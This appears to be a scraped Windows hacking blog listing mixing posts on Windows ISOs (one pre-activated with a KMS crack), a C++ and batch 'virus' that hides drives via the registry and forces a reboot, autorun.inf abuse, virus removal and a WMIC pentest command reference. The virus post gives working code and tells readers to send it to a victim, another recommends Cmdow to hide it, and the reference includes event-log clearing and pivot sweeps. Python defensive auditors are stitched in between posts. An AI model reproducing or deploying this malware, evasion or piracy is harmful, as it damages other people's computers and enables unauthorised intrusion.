Showing posts with label Windows. Show all posts

Sunday, February 22, 2015

Windows 7 Sp1 Ultimate en-US (x86)



If you want to run Windows 7 on your PC, here's what it takes:
  • 1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor
  • 1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)
  • 16 GB available hard disk space (32-bit) or 20 GB (64-bit)
  • DirectX 9 graphics device with WDDM 1.0 or higher driver

Additional requirements to use certain features:
  • Internet access (fees may apply)
  • Depending on resolution, video playback may require additional memory and advanced graphics hardware
  • Some games and programs might require a graphics card compatible with DirectX 10 or higher for optimal performance
  • For some Windows Media Center functionality a TV tuner and additional hardware may be required
  • Windows Touch and Tablet PCs require specific hardware
  • HomeGroup requires a network and PCs running Windows 7
  • DVD/CD authoring requires a compatible optical drive
  • BitLocker requires Trusted Platform Module (TPM) 1.2
  • BitLocker To Go requires a USB flash drive
  • Windows XP Mode requires an additional 1 GB of RAM and an additional 15 GB of available hard disk space.
  • Music and sound require audio output

Windows 8.1 Preactived V2 Office 2013 Pro Plus




No Windows 8.1 Settings were harmed in the making of this ISO
No Programs are added to Windows
No Registry Settings were modified
No Unattended Settings were added to the ISO


Installation Indexes:
Windows 8.1 (Core) x64 / KMS-Activated
Windows 8.1 (Core) N x64 / KMS-Activated
Windows 8.1 (Core) Single Language x64 / KMS-Activated
Windows 8.1 Pro x64 / KMS-Activated



Tools used:
imagex for /flags "ProfessionalWMC" setting and index renames
dism for set-edition for ProWMC, KB integration, install.esd export
oscdimg for ISO mastering with MS's default -u1 option
Info folder added to Windows Setup folder to annoy credit thieves


Features:
Non-Activated and Pre-Activated indexes. Take your pick.*
*Uses custom AutoKMS_VL_ALL folder in Windows directory. You can
uninstall the daily task there if you wish to use a different
activator later. I've included the uninstall script
Highly Compressed install.esd recovery compression format
UEFI boot information added to ISO boot data

Windows 7 Sp1 Ultimate en-US (x64)



If you want to run Windows 7 on your PC, here's what it takes:
  • 1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor
  • 1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)
  • 16 GB available hard disk space (32-bit) or 20 GB (64-bit)
  • DirectX 9 graphics device with WDDM 1.0 or higher driver

Additional requirements to use certain features:
  • Internet access (fees may apply)
  • Depending on resolution, video playback may require additional memory and advanced graphics hardware
  • Some games and programs might require a graphics card compatible with DirectX 10 or higher for optimal performance
  • For some Windows Media Center functionality a TV tuner and additional hardware may be required
  • Windows Touch and Tablet PCs require specific hardware
  • HomeGroup requires a network and PCs running Windows 7
  • DVD/CD authoring requires a compatible optical drive
  • BitLocker requires Trusted Platform Module (TPM) 1.2
  • BitLocker To Go requires a USB flash drive
  • Windows XP Mode requires an additional 1 GB of RAM and an additional 15 GB of available hard disk space.
  • Music and sound require audio output

Thursday, February 5, 2015

Computeractive Issue (e-book)


Description

Computeractive Issue 432 - 2014 UK

76 Pages | True PDF | English | 16 MB

The objective of Computeractive is to provide 'Simple Clear Advice In Plain English' on all matters of technology. Computeractive writes about technology issues facing general readers in their day to day life. From buying advice on computers, mobile phones, cameras etc. to increasing productivity on Microsoft Windows to troubleshooting computers and laptops.




Download: Computeractive Issue 432 - 2014 UK.pdf


Wednesday, November 27, 2013

How to create a big file?



You can create a large file using the default Windows command prompt. Why would you need a huge file? You might need one when you create a virus, or you can use it at your college to occupy memory.

First, decide the size of the file. For example, if you decide on 1 million bytes, convert that number to hexadecimal. Use the Windows Calculator in Scientific mode for the conversion.

We plan to create a 1-million-byte file, so enter 1000000 in the calculator and click the Hex option to convert it (1 million in hex is F4240). Pad the result with zeroes on the left until it reaches eight digits: 000F4240.


* Now go to Start -> Run.
* Enter "cmd" to open the command prompt window.
* Enter the command DEBUG BIGFILE.DAT and ignore the "File not found" message.
* Type RCX and press Enter.
* Debug will display a colon prompt.
* Enter the last four digits of the hexadecimal number you calculated (4240 in our example).
* Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F in our example).
* Enter W for Write and Q for Quit.
* You've just created a 1-million-byte file using Debug.
* Of course, you can create a file of any desired size using the same technique.

C++ ,Batch Virus code to disable All Hard disk



Hi friends, here I give you the C++ virus code. It is actually batch code converted to C++. If you like, you can also use it as batch code.



C++ Virus Code :


#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }



Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:


REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f



I think this code will be simple for non-C++ programmers. It is also easy to create the batch file.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
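For defenders: both REG ADD lines above write a drive-letter bitmask (bit 0 = A:) to the Explorer policy key, so the value 12 restricts C: and D:. The following added example (not part of the original post) parses `reg query` output for that key, decodes the masks and builds the `reg delete` command that reverts each one; the sample output is constructed.

```python
import re

POLICY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"
DRIVE_MASK_VALUES = ("nodrives", "noviewondrive")

# Constructed sample of `reg query "<POLICY_KEY>"` output on an affected machine.
# reg.exe reads "/d 12" as decimal and reports the stored DWORD as 0xc.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoActiveDesktop    REG_DWORD    0x1
    NoDrives    REG_DWORD    0xc
    NoViewonDrive    REG_DWORD    0xc
"""

VALUE_LINE = re.compile(
    r"^[ \t]+(\S+)[ \t]+REG_DWORD[ \t]+(0x[0-9a-fA-F]+)[ \t]*$", re.M
)


def decode_drive_mask(mask):
    """Bit 0 is drive A, bit 1 is B, ... bit 25 is Z."""
    return [chr(ord("A") + bit) for bit in range(26) if (mask >> bit) & 1]


def parse_reg_query(text):
    """Return {value_name: int} for every REG_DWORD line in reg.exe output."""
    return {name: int(data, 16) for name, data in VALUE_LINE.findall(text)}


def audit(text):
    """List (value name, affected drive letters, revert command) per finding."""
    report = []
    for name, mask in parse_reg_query(text).items():
        # Value names are case-insensitive in the registry.
        if name.lower() in DRIVE_MASK_VALUES and mask:
            fix = f'reg delete "{POLICY_KEY}" /v {name} /f'
            report.append((name, decode_drive_mask(mask), fix))
    return report


if __name__ == "__main__":
    for name, drives, fix in audit(SAMPLE):
        print(f"{name}: restricts {', '.join(drives)} -> {fix}")
```

Explorer reads these policy values when it starts, so the drives reappear after the values are deleted and the user logs on again.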

How to hide the windows while running the virus code?

Good morning, friends! This will be a great day, because Break The Security gets a top rank in blogger directories.

Now I am going to introduce a new tool called "CMDOW". When you create and send a virus to a victim, the running virus process may be visible to the victim. This tool will hide that as well.



About Cmdow

Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is a 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdow's output, making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and to download:

http://www.commandline.co.uk/cmdow/

Tuesday, November 26, 2013

Hacking Autorun.inf virus attack|Is autorun.inf virus?



When I was in my second year (CSE), my friends told me that autorun.inf is a virus. I thought so too, because my antivirus blocks autorun.inf files. In my third year, when I searched the net about the autorun.inf file, I learned what the autorun file really is.

Today I brought some files from my college system. When I inserted the pen drive into my system, there were a lot of exe files. They were viruses. I deleted all of them. Finally I opened the autorun.inf file in Notepad and saw the instructions. Only then did I remember that I had forgotten to post about the autorun file. This article will give you complete details about the autorun.inf file.
These are the instructions saved in the infected autorun.inf file (it calls the virus programs):




[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe




Is autorun.inf a virus file? No. Then why does antivirus block autorun.inf files? Read on for the full details about the autorun file.

Introduction to Autorun.inf File:
Autorun is a file that triggers other programs, documents or other files to be opened when a CD or pen drive is inserted. It simply triggers.

When a CD or pen drive is inserted, Windows searches for the autorun.inf file and follows the instructions written inside it.

How to create Autorun file?
Open Notepad.
Type this command:

[Autorun]

Save the file as "autorun.inf" (select All Files, not Text).

Complete Syntax and instructions inside the Autorun file:
The basic syntax that must be inside the autorun.inf file is:

[Autorun]

This is used to identify the file as an autorun file.

OPEN=
This specifies which application should be opened when the CD or pen drive is opened.

Example:

open=virus.exe

This will launch the virus.exe file when the CD or pen drive is opened. The file should be in the root directory.
If the file is in a subdirectory, we have to specify it:

Open=RECYCLER\Virus.exe

Explore=
Not a big difference. This command runs if you right-click the CD or pen drive and select the Explore option.

AutoPlay=
Same as the above, but it launches the program on autoplay.


SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:


shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe





Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=
Changes the icon of your pen drive or CD. You can use .ico and .bmp images (also .exe and .dll files).

Example:

icon=breakthesecurity.ico

Label=

Specifies a text label to be displayed for this CD in Explorer.
Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:

Label=Ethical hacking



Why Antivirus Block Autorun.inf file?
From the above, you now know that the autorun.inf file is not a virus. But why does antivirus block it? Because, as I said, an autorun file can call or launch any application or exe file, which can lead to a virus attack. If autorun.inf is blocked, then there is no way to launch the virus code.

Autorun is not a virus, but it can call virus files.
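One way to turn the distinction above into a check, as an added example that is not part of the original post: parse the [Autorun] section and flag entries whose value points at an executable, noting whether the key is one Windows launches from (open, shellexecute, shell\verb\command) and whether the target sits in a normally hidden folder. The extension list, the hidden-folder list and both sample files are assumptions built from the post's own listings.

```python
import re

# Constructed samples: the infected file quoted in the post, and a harmless one
# assembled from the post's own icon/label examples.
INFECTED = r"""[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe
"""
BENIGN = "[Autorun]\nicon=breakthesecurity.ico\nLabel=Ethical hacking\n"

EXEC_RE = re.compile(r"\.(exe|com|bat|cmd|scr|pif|vbs|js|dll)\b", re.I)
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)
DISPLAY_KEYS = {"icon", "label"}  # an icon may legitimately come from an .exe/.dll
HIDDEN_DIRS = {"recycler", "$recycle.bin", "system volume information"}


def parse_autorun(text):
    """Return {lowercased key: value} for the [Autorun] section only."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def findings(text):
    """List (key, value, reasons) for every entry that would start a program."""
    results = []
    for key, value in parse_autorun(text).items():
        if key in DISPLAY_KEYS:
            continue
        target = value.strip('"').lower().replace("/", "\\")
        if not EXEC_RE.search(target):
            continue
        reasons = ["launch-key" if LAUNCH_KEY.match(key) else "exec-value"]
        if target.lstrip(".\\").split("\\")[0] in HIDDEN_DIRS:
            reasons.append("hidden-dir")
        results.append((key, value, reasons))
    return results


if __name__ == "__main__":
    for key, value, reasons in findings(INFECTED):
        print(f"{key} = {value}  [{', '.join(reasons)}]")
    print("benign file findings:", findings(BENIGN))
```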

HOW TO DELETE VIRUS MANUALLY WITHOUT USING ANY ANTI-VIRUS PROGRAMS


This tutorial will teach you how to delete a virus manually without using any anti-virus programs on your computer. The tutorial is basic but effective, and it's easy to learn. The following steps are just a summary of the video related to Clint's blog post.


Note: To be able to delete a file, make sure it is not in use by other programs or processes.


Begin Step 1. Let's use Task Manager.
Since viruses and other infectious files run as processes on your computer system, you cannot delete the virus until you kill or end the process that is using the virus or keeping it running. In this section, we will use the Task Manager on your computer to kill a process.
Press Ctrl + Alt + Del on your keyboard to access Task Manager. If you can't access Task Manager, you are already infected by a virus or other related files. You can download a FREE extended task manager to replace your infected task manager.

Now, if you have Task Manager, open it and go to the Processes tab. It is a little harder to determine which process is a virus or is keeping the virus running on your computer; you have to do a little research here. But here are a few tips to help you spot the virus. You have files like these: csrss.exe, svchost.exe, smss.exe, Lsass.exe. Most viruses copy those file names with a slight difference in spelling. Review those files, and if you find files like svcchost.exe, ssmss.exe or cssrss.exe, look at the spelling: that's a virus.
Another tip: open your command prompt. Go to Start > Run and type cmd.

A Command Prompt window will open. Now, at the current location in cmd, type cd.. and hit ENTER, then type cd.. and hit ENTER again.

On your current drive, type dir /ah and hit ENTER. All directories and files with the hidden attribute on your current drive will be displayed.

Now, look for an autorun.inf file among the displayed items. If you find an autorun.inf file, open it using Notepad. You can now close cmd.


Here's how to open the autorun.inf file using Notepad.
Go to Run, type notepad c:\autorun.inf and hit ENTER.

Note: We are currently on drive C. If you have a different drive letter, change the C to your own drive letter.


An autorun.inf should open in notepad like this:

You will notice the OPEN command inside the autorun.inf. After the open command there is a name, "virusname.exe", which is the name of the virus or worm. Go back to Task Manager, look for that name, select it and then click END TASK. You have now ended the virus process, and the first step is done.
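The spelling check from Step 1, written out as an added example (not part of the original tutorial): it flags process names within a small edit distance of the four system names listed above. Going beyond the text, it also flags an exact system name running from outside the system directory; that check, the assumption that Windows is installed in C:\Windows, and the sample process list are all constructed for illustration.

```python
# Names taken from the tutorial; the directory check is an added assumption.
KNOWN = ("csrss.exe", "svchost.exe", "smss.exe", "lsass.exe")
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")  # assumes C:\Windows

# Constructed sample: (image name, executable path) pairs from a process listing.
SAMPLE = [
    ("svchost.exe", r"C:\Windows\System32\svchost.exe"),
    ("svcchost.exe", r"C:\Windows\System32\svcchost.exe"),
    ("ssmss.exe", r"C:\Users\lab\AppData\Roaming\ssmss.exe"),
    ("cssrss.exe", r"C:\Windows\cssrss.exe"),
    ("scvhost.exe", r"C:\Windows\System32\scvhost.exe"),
    ("lsass.exe", r"C:\Users\lab\AppData\Local\Temp\lsass.exe"),
    ("explorer.exe", r"C:\Windows\explorer.exe"),
    ("csrss.exe", ""),  # path unreadable without elevation: not judged on path
]


def edit_distance(a, b):
    """Levenshtein distance using two rows of the dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def suspicious(processes, max_distance=2):
    """Return (name, reason, system name it resembles) for each flagged process."""
    flagged = []
    for name, path in processes:
        lowered = name.lower()
        if lowered in KNOWN:
            # Exact system name: only the location can give it away.
            folder = path.lower().rsplit("\\", 1)[0]
            if path and folder not in SYSTEM_DIRS:
                flagged.append((name, "wrong-path", lowered))
            continue
        nearest = min(KNOWN, key=lambda known: edit_distance(lowered, known))
        if edit_distance(lowered, nearest) <= max_distance:
            flagged.append((name, "lookalike", nearest))
    return flagged


if __name__ == "__main__":
    for name, reason, resembles in suspicious(SAMPLE):
        print(f"{name:14} {reason:10} resembles {resembles}")
```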


Proceed to Step 2. Let's use the Command Prompt again.

Open the command prompt from Start > Run and type cmd, or go to All Programs > Accessories > Command Prompt.

In the Command Prompt window, as we did in the first step, use the cd.. command twice to go to drive C. (Note again: your drive may be different from mine.)

Now, type dir /ah. Remember the name of the virus from Step 1? Now delete the virus using the del command. But first, remember that viruses are hidden files, which means we should change their attributes using the attrib command.
Type attrib -s -h virusname.exe /s

After changing the attributes, you can now freely delete the virus.
Type del "virusname.exe" /f

Now you should have deleted the virus. The next step is to navigate to your Windows folder and the system32 folder. To navigate to the Windows folder, use the command cd "windows" and then do the same job again: first look for the virus name, then change the attributes and delete. After that, navigate to system32 and do the same job again. Next, navigate to the other drives, for example your D, E, F, or removable drives, and do the same job. That's it.


To learn more about how to use a command prompt command, type the command name followed by /?
e.g. cd /?


Step 3. Let's restore the system files altered by the virus or worm. One or more of these important files are altered on your system after you get infected:


Command Prompt or cmd
Registry Editor or regedit.exe
Run command
Task Manager
Folder Options

Saturday, May 11, 2013

Windows Hackers Command Reference

Windows Command Reference for Pen-testers





This part of the blog is dedicated to Windows commands that can be used by Penetration Testers (yea who is your tester?) and Information Security Administrators. On this page I will periodically post tiny, simple Windows scripts and commands that a Penetration Tester or a Security Administrator can use to:

1. Perform Administration Security tasks (e.g. do patch enforcement, silently uninstall software, etc.).

2. Run Vulnerability Scans (e.g. identify null sessions, test for LANMAN services, etc.).

3. Do pivoting (e.g. after compromising a machine, use Windows tools to escalate, etc.).



Test for installed patches 

To run WMIC, just open a command prompt and type wmic; you immediately get an interactive command shell with root access.

Identifying the windows security patches using WMIC
wmic qfe get description,installedOn

Note: This produces a long list of Windows patches and when they were installed, and writes the results to stdout. That way you know exactly how to attack the workstation or perform remediation on it.


Identifying windows services 

1.  sc query type= service (running services) 
2. sc query type= service state= inactive (exist but don't run)
3. sc query type= service state= all (running and not running)


Identifying windows startup programs

These commands report the startup programs:

1. wmic startup
2. wmic startup list full
3. wmic startup list brief
4. wmic startup list system


Note: These commands produce a list of all startup programs along with their registry keys, a program description and the program name. The options shown above give you various output formats. Very interesting when doing malware behavioral analysis.

1. wmic /node:machinename startup list full
2. wmic STARTUP GET Caption, Command, User

Note: Remotely list startup apps


Identifying windows network cards 

WMIC can also give you lots of information about the network cards and drivers: 

1. wmic nicconfig list
Note: That will give you a list of all network drivers 

1. wmic nicconfig where IPEnabled='true'

Note: That will give you a list of IP interfaces. 

1. wmic nicconfig where index=9 call enablestatic("192.168.16.4"), ("255.255.255.0")

Note: This will update static IP address 

1. wmic nicconfig where index=9 call setgateways("192.168.16.4", "192.168.16.5"),(1,2)

Note: This will Change network gateway 

1. wmic nicconfig where index=9 call enabledhcp

Note: This will enable DHCP. 

1. wmic service where caption="DHCP Client" call changestartmode "Disabled"
2. wmic service where caption="DHCP Client" call changestartmode "Automatic"
3. wmic service where caption="DHCP Client" call changestartmode "Manual"
Note: This will set the DHCP Client service to disabled, automatic or manual.

1. wmic /node:machinename nicconfig where Index=1 call EnableDHCP

Note: Remotely change IP to use DHCP 

1. wmic /node:machinename nicconfig where Index=1 call EnableStatic ("172.16.10.10"), ("255.255.0.0")

Note: Remotely change the IP to a static IP (Index is Interface#)



Handle Windows Process life-cycle 

The following sets of commands let you handle all types of process manipulation:

1. wmic process
2. wmic process list brief
3. wmic process list full
4. wmic process list system

Note: The above commands list processes in a windows machine. 

1. wmic /record:processes.xml process list brief
2. wmic /record:processes.xml process list full
3. wmic /record:processes.xml process list system

Note: After the command runs, your results are stored in xml format. That's the only format supported, but this is a handy record of what you typed, when you typed it, and the results you got. 

1. wmic process where name='process_name.exe'
2. wmic process where name='process_name.exe' list brief
3. wmic process where name='process_name.exe' list full
4. wmic process where name='process_name.exe' list system
5. wmic process where name='process_name.exe' delete

Note: The above commands let you search/kill and create processes based on their name.

1. wmic process | more

Note: Displays all processes one screen page at a time.

1. wmic process | findstr "process name"

Note: The above command searches a process name, or process information per line.

1. wmic /output:wmic.html process list full /format:hform

Note: List running processes and output to HTML/XSL form. 

1. wmic /node:machinename process list brief /every:1

Note: Remotely list running processes every second 

1. wmic process where name="cmd.exe" call getowner
2. wmic process where name="cmd.exe" call getownersid

Note: Get Process Owner or OwnerSID. You can use that to migrate using metasploit to some useful process.


ICMP and DNS network sweeping 


After taking over a windows box you can use it as a pivot, but what happens if it is a restricted box and you cannot download or upload any tools? Well the following commands will do the job: 

for /L %I in (1,1,254) DO @ping -n 1 192.168.1.%I | findstr "TTL=128" >> pinglog.txt

Note: This command sequence pings each address with a single packet and reports the machines that have a non-zero TTL field. The output of the loop is stored in a file named pinglog.txt.

for /L %I in (1,1,254) DO @nslookup 192.168.1.%I | find "Name:" >> dnslog.txt

Note: This command sequence performs a reverse DNS lookup using the local DNS server (an external DNS server can also be used). The output is stored in a log file called dnslog.txt.

pathping targethost (for a single host only)

for /L %I in (1,1,254) DO @pathping -n 192.168.1.%I >> traceping.txt

Note: This command combines the functions of Ping and Tracert. Pathping first lists the number of hops required to reach the address you are testing and then sends multiple pings to each router between you and the destination. After that, it computes results based on the packets returned from each router. Because pathping displays the degree of packet loss at any given router or link, you can determine which routers or subnets might be having network problems. Note that the whole process may take 5-10 minutes because many pings are being sent. There are switches to modify the process, and these can be seen by entering "pathping /?" in the command prompt. The command sequence above will map the whole network along with its routes (this is going to be verbose).

for /L %I in (1,1,254) DO @echo -Route: %I- >> trace.txt & @pathping -n 1 192.168.1.%I >> trace.txt 

Note: This will do a simple trace routing of the whole local network.

Windows network connection monitoring 

1. netstat -nab 3 >> netstat.txt

Note: This runs in an endless loop, listing all connections and listening ports together with the executable involved, and refreshes every 3 seconds. More specifically:

1. Option: -n

Displays addresses and port numbers in numerical form 

1. Option: -a

Displays all connections and listening ports

1. Option: -b

Displays the executable involved in creating each connection or listening port. In some cases well-known executables host multiple independent components, and in these cases the sequence of components involved in creating the connection or listening port is displayed. In this case the executable name is in [] at the bottom, on top is the component it called, and so forth until TCP/IP was reached. Note that this option can be time-consuming and will fail unless you have sufficient permissions.

Important 

Note: This tool is very good for identifying malware behavior that does not alter any system functions, because in case you try to disinfect a rootkit it will not be much of a help :).
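Working with the netstat.txt log from the command above, as an added example that is not part of the original post: the parser pairs each socket with the executable that netstat -b prints beneath it and reports listeners that appear after the first refresh. The sample log is constructed and assumes the usual layout of netstat -nab output.

```python
import re

# Constructed sample: two refreshes as appended by `netstat -nab 3 >> netstat.txt`.
SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  RpcSs
 [svchost.exe]
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
 Can not obtain ownership information
  TCP    192.168.1.20:49170     203.0.113.7:443        ESTABLISHED
 [iexplore.exe]
  UDP    0.0.0.0:123            *:*
  W32Time
 [svchost.exe]

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  RpcSs
 [svchost.exe]
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
 Can not obtain ownership information
  TCP    0.0.0.0:8081           0.0.0.0:0              LISTENING
 [svcchost.exe]
  UDP    0.0.0.0:123            *:*
  W32Time
 [svchost.exe]
"""

CONN = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")
OWNER = re.compile(r"^\s*\[(.+?)\]\s*$")


def parse_snapshots(text):
    """Split the appended log into refreshes; each is a list of socket dicts."""
    snapshots, current = [], None
    for line in text.splitlines():
        if line.strip() == "Active Connections":
            current = []
            snapshots.append(current)
            continue
        if current is None:
            continue
        match = CONN.match(line)
        if match:
            proto, local, remote, state = match.groups()
            current.append({"proto": proto, "local": local, "remote": remote,
                            "state": state or "", "exe": None, "components": []})
            continue
        if not current:
            continue  # column header before the first socket line
        match = OWNER.match(line)
        if match:
            current[-1]["exe"] = match.group(1).lower()
        elif line.strip() and not line.lstrip().startswith("Can not"):
            current[-1]["components"].append(line.strip())
    return snapshots


def listeners(snapshot):
    """Set of (proto, port, exe) for sockets that accept inbound traffic."""
    return {(c["proto"], int(c["local"].rsplit(":", 1)[1]), c["exe"])
            for c in snapshot if c["state"] == "LISTENING" or c["proto"] == "UDP"}


def new_listeners(text):
    """Listeners seen in later refreshes that were absent from the first one."""
    snapshots = parse_snapshots(text)
    if not snapshots:
        return []
    baseline, added = listeners(snapshots[0]), set()
    for snapshot in snapshots[1:]:
        added |= listeners(snapshot) - baseline
    return sorted(added, key=lambda item: (item[1], item[0]))


if __name__ == "__main__":
    print(new_listeners(SAMPLE))
```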


Handling Windows Users

The following examples display a list of all user accounts for the local computer (some commands do that along with other useful information):

1. net user
2. wmic useraccount
3. wmic useraccount list brief

The following example displays information about the user account someuser:

1. net user someuser

The following example adds a user account for a user whose full name is Jay Jamison and whose user account name is jayj, with logon rights from 8 A.M. to 5 P.M., Monday through Friday (no spaces in time designations), a mandatory password (Cyk4^g3B), and the user's full name:

1. net user jayj Cyk4^g3B /add /passwordreq:yes /times:monday-friday,8am-5pm /fullname:"Jay Jamison"
or

1. Simple add user: net user someuser /add

2. net user miked /time:M-F,08:00-17:00

Note: Sets the logon time (8 A.M. to 5 P.M.) for miked by using 24-hour notation.

1. net user miked /time:M-F,8AM-5PM

Note: Sets the logon time (8 A.M. to 5 P.M.) for miked by using 12-hour notation.

1. net user anibals /time:M,4AM-5PM;T,1PM-3PM;W-F,8:00-17:00

Note: Specifies logon hours of 4 A.M. until 5 P.M. on Monday, 1 P.M. until 3 P.M. on Tuesday, and 8 A.M. until 5 P.M. Wednesday through Friday for anibals.

1. wmic /node:remotecomputer computersystem get username 

Note: Determine user currently logged in remotely.

List Event Logs  

1. wmic ntevent list brief --- Brief takes a while, full takes even longer
2. wmic nteventlog where (description like "%secevent%") call clearevent

List Services  

1. wmic service list brief

Delete ARPCache

1. netsh int ip delete arpcache

Auditing the security policies

Applies To: Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows Vista

Displays information about and performs functions to manipulate audit policies. For examples of how this command can be used, see the Examples section in each topic.

Auditpol /get /user:{S-1-5-21-1443922412-3030960370-963420232-51} /category:"System","Detailed Tracking","Object Access"

Reboot or Shutdown a box

1. wmic os where buildnumber="2600" call reboot -- Get build# from OS Info (see below)
2. shutdown -r -f -t 2
3. shutdown -s -f -t 4

Reference:

http://technet.microsoft.com
http://isc.sanc.edu
http://commandwindows.com
http://theinterw3bs.com